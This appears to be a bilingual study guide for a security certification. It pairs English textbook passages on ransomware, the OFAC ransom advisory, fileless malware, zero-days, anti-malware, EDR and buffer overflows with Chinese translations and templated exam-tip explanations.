随后,用户会收到一条消息,通知其文件已被加密,并要求在特定截止日期前 支付赎金,以防止文件永久无法访问。 一些攻击者更进一步,威胁称如果未支 付赎金,他们将公开发布敏感信息。 勒索软件自1989年以来就已存在,但近年来其使用和影响迅速加剧。 早期的勒 索软件攻击主要针对个人用户,要求支付数百美元的相对较小金额; 而近期的 攻击则转向大型企业。 执法机构、医院和政府办公室都已成为大规模、复杂勒 索软件攻击的受害者。 事实上,根据Check Point的研究,2023年,全球每10 个组织中就有1个遭遇过勒索软件攻击尝试。 遭受勒索软件攻击的组织面临艰难的抉择:如何继续前行。 拥有强大备份和 恢复机制的组织可能在从备份重建系统并修复以防止未来感染的过程中经历 一些停机时间; 而缺乏数据备份的组织则被迫支付赎金,以重新获得对数据 的访问权限。 攻击者了解这一艰难处境,并利用其优势地位。 Statista的一项研究发现, 2023年,全球报告遭受勒索软件感染的组织中,约有73%选择了支付赎金。 这 给受影响的公司带来了严峻的道德困境:他们应该支付赎金以奖励犯罪行为, 还是冒永久失去数据访问权限的风险?

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 17 / PDF P1411

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Paying Ransom May Be Illegal In addition to the ethical considerations around ransom payments, there are also serious legal concerns. In 2021, the U.S. Department of the Treasury's Office of Foreign Assets Control (OFAC) informed U.S. firms that many ransomware authors are subject to economic sanctions, making payments to them illegal. The advisory read, in part: Facilitating a ransomware payment that is demanded as a result of malicious cyber activities may enable criminals and adversaries with a sanctions nexus to profit and advance their illicit aims.

For example, ransomware payments made to sanctioned persons or to comprehensively sanctioned jurisdictions could be used to fund activities adverse to the national security and foreign policy objectives of the United States. Such payments not only encourage and enrich malicious actors, but also perpetuate and incentivize additional attacks. Moreover, there is no guarantee that companies will regain access to their data or be free from further attacks themselves. For these reasons, the U.S. government strongly discourages the payment of cyber ransom or extortion demands.

Firms considering the payment of a ransom should read the full advisory at https://ofac.treasury.gov/media/912981/download?inline and also seek legal advice prior to engaging with ransomware authors. Malicious Scripts Technologists around the world rely on scripting and automation to improve the efficiency and effectiveness of their work. It's not uncommon to find libraries of scripts written in languages such as PowerShell and Bash that execute sequences of command-line instructions in a highly automated fashion. For example, an administrator might write a PowerShell script that runs on a Windows domain each time a new user is added to the organization.

The script might provision their user account, configure rolebased access control, send an email with welcoming information, and perform other administrative tasks. Administrators may trigger the script manually or integrate it with the human resources system to automatically run when the organization hires a new employee.

中文直译 / 整理

支付赎金可能违法 除了关于支付赎金的道德考量外,还存在严重的法律问题。 2021年,美国 财政部外国资产控制办公室(OFAC)告知美国企业,许多勒索软件作者 受到经济制裁,向他们支付赎金属于违法行为。 该建议书部分内容如下: 为因恶意网络活动而勒索的赎金提供便利,可能使与制裁有关的犯罪 分子和对手获利并推进其非法目标。 例如,向受制裁人员或全面制裁 地区支付的勒索软件付款,可能被用于资助损害美国国家安全和外交 政策目标的活动。 此类付款不仅鼓励并使恶意行为者获利,还助长并 激励更多攻击的发生。 此外,无法保证企业能够恢复对数据的访问权 限,或免受进一步攻击。 因此,美国政府强烈反对支付网络勒索或恐 吓要求。 考虑支付赎金的公司应阅读完整公告: https://ofac.treasury.gov/media/912981/download?inline,并在与勒索 软件作者接触前寻求法律建议。 恶意脚本 全球的技术人员依靠脚本和自动化来提高工作的效率和效果。 编写使用 PowerShell和Bash等语言的脚本库,以高度自动化的方式执行一系列命令行 指令,并不罕见。

例如,管理员可能会编写一个PowerShell脚本,每当组织 中添加新用户时,该脚本便会在Windows域中运行。 该脚本可能会为其创建 用户账户、配置基于角色的访问控制、发送包含欢迎信息的电子邮件,并执行 其他管理任务。 管理员可以手动触发该脚本,或将其与人力资源系统集成,以 便在组织雇佣新员工时自动运行。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 18 / PDF P1412

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Unfortunately, this same scripting technology is available to improve the efficiency of malicious actors. In particular, APT organizations often take advantage of scripts to automate routine portions of their malicious activity. For example, they might have a PowerShell script to run each time they gain access to a new Windows system that attempts a series of privilege escalation attacks. Similarly, they might have another script that runs when they gain administrative access to a system that joins it to their command-and-control network, opens backdoors for future access, and other routine tasks. Malicious scripts are also commonly found in a class of malware known as fileless malware.

These fileless attacks never write files to disk, making them more difficult to detect. For example, a user might receive a malicious link in a phishing message. That link might exploit a browser vulnerability to execute code that downloads and runs a PowerShell script entirely in memory, where it triggers a malicious payload. No data is ever written to disk, and anti-malware controls that depend on the detection of disk activity would not notice the attack. Zero-Day Attacks Many forms of malicious code take advantage of zero-day vulnerabilities, security flaws discovered by attackers that have not been thoroughly addressed by the security community.

There are two main reasons systems are affected by these vulnerabilities: The necessary delay between the discovery of a new type of malicious code and the issuance of patches and antivirus updates. This is known as the window of vulnerability. Slowness in applying updates on the part of system administrators. The existence of zero-day vulnerabilities makes it critical that you have a defense-in-depth approach to cybersecurity that incorporates a varied set of overlapping security controls. These should include a strong patch management program, current antivirus software, configuration management, application control, content filtering, and other protections.

When used in conjunction with each other, these overlapping controls increase the likelihood that at least one control will detect and block attempts to install malware. Chapter 17 provided more information about zero-day attacks.

中文直译 / 整理

不幸的是,这种相同的脚本技术也可供恶意行为者利用,以提高其效率。 特别 是,APT组织经常利用脚本来自动化其恶意活动中的常规部分。 例如,他们可 能拥有一个PowerShell脚本,每次获得对新Windows系统的访问权限时都会 运行,尝试一系列权限提升攻击。 类似地,他们可能还有另一个脚本,在获得 系统的管理员权限时运行,将该系统加入其命令与控制网络、打开后门以供将 来访问,以及其他常规任务。 恶意脚本也常见于一类称为 无文件恶意软件 的恶意软件中。 这些无文件攻 击永远不会将文件写入磁盘,因此更难以检测。 例如,用户可能在钓鱼消息中 收到一个恶意链接。 该链接可能利用浏览器漏洞在内存中执行代码,下载并运 行一个 PowerShell 脚本,从而触发恶意负载。 没有任何数据被写入磁盘,依 赖于检测磁盘活动的反恶意软件控制措施将无法察觉此类攻击。 零日攻击 许多形式的恶意代码利用 零日漏洞,即攻击者发现但安全社区尚未充分应对 的安全缺陷。 系统受这些漏洞影响主要有两个原因: 在发现新型恶意代码与发布补丁和杀毒软件更新之间存在的必要延迟。 这 被称为 漏洞窗口。 系统管理员应用更新的迟缓。

零日漏洞的存在使得您必须采用纵深防御的网络安全策略,该策略应包含一系 列重叠的安全控制措施。 这些措施应包括强大的补丁管理程序、最新的防病毒 软件、配置管理、应用程序控制、内容过滤以及其他保护措施。 当这些重叠的 控制措施协同使用时,将提高至少一项控制措施能够检测并阻止恶意软件安装 的可能性。 第17章提供了有关零日攻击的更多信息。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

纵深防御:纵深防御不是一道门,而是一层又一层控制。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

多层控制串联、避免单点失败,就是 defense in depth。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
纵深防御 纵深防御不是一道门,而是一层又一层控制。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 19 / PDF P1413

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Malware Prevention Cybersecurity professionals must take steps to protect their organization against a wide variety of malware threats. As you read in the previous sections of this chapter, these threats come in many forms and defending against them requires a multipronged approach. Platforms Vulnerable to Malware Most computer viruses are designed to disrupt activity on systems running versions of the world's most popular operating system—Microsoft Windows. In a 2020 analysis by http://av-test.org, researchers estimated that 83 percent of malware in existence targets the Windows platform.

This is a significant change from past years, when more than 95 percent of malware targeted Windows systems; it reflects a change in malware development that has begun to target mobile devices and other platforms. Significantly, the amount of malware targeting Mac systems recently tripled, while the number of malware variants targeting Android devices doubled that same year. The bottom line is that users of all operating systems should be aware of the malware threat and ensure that they have adequate protections in place. Anti-malware Software Anti-malware software is now a cornerstone of every cybersecurity program.

System administrators would probably not even consider the idea of deploying an endpoint (such as a desktop, laptop, or mobile device) or server that did not contain basic anti-malware software designed to block the vast majority of threats commonly found in today's environment. Failure to do so is akin to failing to wear a seat belt when driving a car: it's simply unsafe and irresponsible. The vast majority of these packages use a method known as signature-based detection to identify potential virus infections on a system. Essentially, an antivirus package maintains an extremely large database that contains the telltale characteristics of all known viruses.

Depending on the antivirus package and configuration settings, it scans storage media periodically, checking for any files that contain data matching those criteria. If any are detected, the antivirus package takes one of the following actions:

中文直译 / 整理

恶意软件防护 网络安全专业人员必须采取措施,保护其组织免受各种恶意软件威胁。 正 如本章前面部分所读到的,这些威胁形式多样,防御它们需要采取多管齐 下的方法。 易受恶意软件攻击的平台 大多数计算机病毒旨在破坏运行全球最流行操作系统——Microsoft Windows版本的系统。 根据http://av-test.org在2020年的分析,研究人员 估计,现存恶意软件中有83%针对Windows平台。 这与过去几年的情况有显 著不同,当时超过95%的恶意软件针对Windows系统; 这一变化反映了恶意 软件开发趋势的转变,开始转向移动设备和其他平台。 值得注意的是,针对Mac系统的恶意软件数量最近增加了三倍,而针对 Android设备的恶意软件变种数量在同一年翻了一番。 总而言之,所有操作系 统的用户都应意识到恶意软件的威胁,并确保已采取充分的防护措施。 反恶意软件 反恶意软件如今已成为每个网络安全计划的基石。 系统管理员几乎不会考虑部 署不包含基本反恶意软件的终端(如台式机、笔记本电脑或移动设备)或服务 器,这些软件旨在阻止当今环境中常见的绝大多数威胁。 不这样做就如同开车 时不系安全带:既不安全,也不负责任。

这些软件包中的绝大多数使用一种称为基于签名的检测的方法来识别系统上的 潜在病毒感染。 本质上,防病毒软件包维护一个包含所有已知病毒特征的超大 数据库。 根据防病毒软件包和配置设置的不同,它会定期扫描存储介质,检查 是否存在包含符合这些特征数据的文件。 如果检测到任何此类文件,防病毒软 件包将采取以下措施之一:

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 20 / PDF P1414

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

If the software can eradicate the virus, it disinfects the affected files and restores the machine to a safe condition. If the software recognizes the virus but doesn't know how to disinfect the files, it may quarantine the files until the user or an administrator can examine them manually. If security settings/policies do not provide for quarantine or the files exceed a predefined danger threshold, the antivirus package may delete the infected files in an attempt to preserve system integrity. When using a signature-based antivirus package, it's essential to remember that the package is only as effective as the virus definition file on which it's based.

If your virus definitions are not frequently updated, your antivirus software will not be able to detect newly created viruses. With thousands of viruses appearing on the Internet each day, an outdated definition file will quickly render your defenses ineffective. Many antivirus packages also use heuristic mechanisms to detect potential malware infections. These methods analyze the behavior of software, looking for the telltale signs of virus activity, such as attempts to elevate privilege level, cover their electronic tracks, and alter unrelated or operating system files.

This approach was not widely used in the past but has now become the mainstay of the advanced endpoint protection solutions used by many organizations. A common strategy is for systems to quarantine suspicious files and send them to a malware analysis tool, where they are executed in an isolated but monitored environment. If the software behaves suspiciously in that environment, it is blocked throughout the organization, rapidly updating antivirus signatures to meet new threats. Modern antivirus software products are able to detect and remove a wide variety of types of malicious code and then clean the system. In other words, antivirus solutions are rarely limited to viruses.

These tools are often able to provide protection against worms, Trojan horses, logic bombs, rootkits, spyware, and various other forms of emailor web-borne code. In the event that you suspect new malicious code is sweeping the Internet, your best course of action is to contact your antivirus software vendor to inquire about your state of protection against the new threat. Don't wait until the next scheduled or automated signature dictionary update. Furthermore, never accept the word of any third party about protection status offered by an antivirus solution. Always contact the vendor directly. Most responsible antivirus vendors will send alerts to their customers as soon as new,

中文直译 / 整理

如果软件能够清除病毒,它将对受感染的文件进行消毒,并将系统恢复到安全状态。 如果软件能够识别病毒但不知道如何清除文件,它可能会将文件隔离,直 到用户或管理员能够手动检查它们。 如果安全设置/策略未提供隔离功能,或文件超过预设的危险阈值,杀毒 软件可能会删除受感染的文件,以试图保持系统完整性。 使用基于特征码的杀毒软件时,必须记住,该软件的有效性完全取决于其依 赖的病毒定义文件。 如果您的病毒定义未频繁更新,您的杀毒软件将无法检 测到新创建的病毒。 每天互联网上都会出现数千种新病毒,过时的定义文件 将迅速使您的防护失效。 许多杀毒软件还使用启发式机制来检测潜在的恶意软件感染。 这些方法分析软 件的行为,寻找病毒活动的典型迹象,例如尝试提升权限级别、掩盖电子痕迹 以及修改无关文件或操作系统文件。 过去这种方法并未广泛使用,但现在已成 为许多组织使用的高级终端防护解决方案的主要手段。 一种常见的策略是,系 统将可疑文件隔离并发送到恶意软件分析工具中,在隔离但受监控的环境中执 行。 如果软件在该环境中表现出可疑行为,它将被整个组织阻止,并快速更新 杀毒特征码以应对新威胁。

现代防病毒软件产品能够检测并移除多种类型的恶意代码,然后清理系统。 换 句话说,防病毒解决方案很少仅限于病毒。 这些工具通常能够提供针对蠕虫、 特洛伊木马、逻辑炸弹、根套件、间谍软件以及各种其他通过电子邮件或网页 传播的代码的保护。 如果您怀疑有新的恶意代码正在互联网上蔓延,您最好的 做法是联系您的防病毒软件供应商,咨询您对新威胁的防护状态。 不要等到下 一次计划的或自动的特征库更新。 此外,绝不要轻信任何第三方关于防病毒解 决方案防护状态的说法。 请始终直接联系供应商。 大多数负责任的防病毒供应 商会在识别出新的

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 21 / PDF P1415

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

substantial threats are identified, so be sure to register for such notifications as well. Anti-malware software also includes centralized monitoring and control capabilities that allow administrators to enforce configuration settings and monitor alerts from a centralized console. This may be done with a standalone console offered by the anti-malware vendor or as an integrated component of a broader security monitoring and management solution. Integrity Monitoring Other security packages, such as file integrity monitoring tools, also provide a secondary antivirus functionality. These tools are designed to alert administrators to unauthorized file modifications.

They are often used to detect web server defacements and similar attacks, but they also may provide some warning of virus infections if critical system executable files, such as command.com, are modified unexpectedly. These systems work by maintaining a database of hash values for all files stored on the system (see Chapter 6 for a full discussion of the hash functions used to create these values). These archived hash values are then compared to current computed values to detect any files that were modified between the two periods. At the most basic level, a hash is a number used to summarize the contents of a file. As long as the file stays the same, the hash will stay the same.

If the file is modified, even slightly, the hash will change dramatically, indicating that the file has been modified. Unless the action seems explainable, for instance if it happens after the installation of new software, application of an operating system patch, or similar change, sudden changes in executable files may be a sign of malware infection. Advanced Threat Protection Endpoint detection and response (EDR) packages go beyond traditional antimalware protection to help protect endpoints against attack. They combine the anti-malware capabilities found in traditional antivirus packages with advanced techniques designed to better detect threats and take steps to eradicate them.

Some of the specific capabilities of EDR packages are as follows: Analyzing endpoint memory, file system, and network activity for signs of malicious activity

中文直译 / 整理

重大威胁时立即向客户发送警报,因此请务必注册此类通知。 反恶意软件软件还包括集中监控和控制功能,允许管理员通过集中控制台强 制执行配置设置并监控警报。 这可以通过反恶意软件供应商提供的独立控制 台实现,也可以作为更广泛的安全监控和管理解决方案的集成组件来实现。 完整性监控 其他安全套件,例如文件完整性监控工具,也提供辅助的反病毒功能。 这些工 具旨在向管理员发出未经授权的文件修改警报。 它们通常用于检测网站服务器 被篡改及类似攻击,但如果关键系统可执行文件(如command.com)被意外修改, 也可能提供病毒感染的预警。 这些系统通过维护系统上所有存储文件的哈希值 数据库来工作(有关用于生成这些值的哈希函数的完整讨论,请参见第6章)。 这些存档的哈希值随后与当前计算的值进行比较,以检测在两个时间段之间被 修改的任何文件。 在最基础的层面上,哈希是一个用于总结文件内容的数字。 只要文件保持不变,哈希值就不会改变。 如果文件被修改,即使只是轻微改动, 哈希值也会发生显著变化,表明文件已被修改。 除非这种变化有合理解释,例 如发生在安装新软件、应用操作系统补丁或类似变更之后,否则可执行文件的 突然变化可能是恶意软件感染的迹象。

高级威胁防护 端点检测与响应(EDR)软件包超越了传统的反恶意软件保护,帮助保护端点 免受攻击。 它们结合了传统防病毒软件中的反恶意软件功能以及旨在更好检测 威胁并采取措施根除威胁的先进技术。 EDR软件包的一些具体功能如下: 分析端点的内存、文件系统和网络活动,以寻找恶意活动的迹象

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

哈希本身不提供机密性;它主要用于完整性校验。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 22 / PDF P1416

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Automatically isolating possible malicious activity to contain the potential damage Integration with threat intelligence sources to obtain real-time insight into malicious behavior elsewhere on the Internet Integration with other incident response mechanisms to automate response efforts Many security vendors offer EDR capabilities as a managed service offering where they provide installation, configuration, and monitoring services to reduce the load on customer security teams. These managed EDR offerings are known as managed detection and response (MDR) services.

In addition, user and entity behavior analytics (UEBA) packages pay particular attention to user-based activity on endpoints and other devices, building a profile of each individual's normal activity and then highlighting deviations from that profile that may indicate a potential compromise. UEBA tools differ from EDR capabilities in that UEBA has an analytic focus on the user, whereas EDR has an analytic focus on the endpoint. Next-generation endpoint protection tools often incorporate many of these different capabilities.

The same suite may offer modules that provide traditional anti-malware protection, file integrity monitoring, endpoint detection and response, and user and entity behavior analytics. Application Attacks In Chapter 20, you learned about the importance of using solid software engineering processes when developing operating systems and applications. In the following sections, you'll take a brief look at some of the specific techniques that attackers use to exploit vulnerabilities left behind by sloppy coding practices. Buffer Overflows Buffer overflow vulnerabilities exist when a developer does not properly validate user input to ensure that it is of an appropriate size.

Input that is too large can “overflow” a data structure to affect other data stored in the computer's memory. For example, if a web form has a field that ties to a backend variable that allows 10 characters, but the form processor does not verify the length of the input, the operating system may try to write data past

中文直译 / 整理

自动隔离可能的恶意活动,以限制潜在损害 与威胁情报源集成,以获取互联网其他地方恶意行为的实时洞察 与其他事件响应机制集成,以自动化响应工作 许多安全厂商将EDR功能作为托管服务提供,包括安装、配置和监控服务, 以减轻客户安全团队的负担。 这些托管EDR服务被称为托管检测与响应( MDR)服务。 此外,用户和实体行为分析(UEBA)包特别关注终端和其他设备上的基于用 户的行为,建立每个个体正常活动的档案,然后突出显示可能表明潜在入侵的 偏离该档案的行为。 UEBA工具与EDR功能的不同之处在于,UEBA侧重于用 户的分析,而EDR侧重于终端的分析。 下一代终端保护工具通常整合了这些多种功能。 同一套件可能提供提供传统 反恶意软件保护、文件完整性监控、终端检测与响应以及用户和实体行为分 析的模块。 应用攻击 在 第 20 章中,您了解了在开发操作系统和应用程序时使用稳健的软件工程 流程的重要性。 在接下来的章节中,您将简要了解攻击者如何利用因草率编 码实践遗留的漏洞。 缓冲区溢出 缓冲区溢出 漏洞存在于开发人员未正确验证用户输入以确保其大小适当的情况 下。 过大的输入可能会“溢出”数据结构,影响计算机内存中存储的其他数据。

例如,如果网页表单有一个字段关联到一个允许10个字符的后端变量,但表单 处理器未验证输入长度,操作系统可能会尝试将数据写入超出

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

程序:程序是一步一步怎么做。

事件响应:事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

ISO 偏标准和管理体系。

Step-by-step、SOP 常对应 procedure。

准备、检测、遏制、根除、恢复、经验教训是常见顺序。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
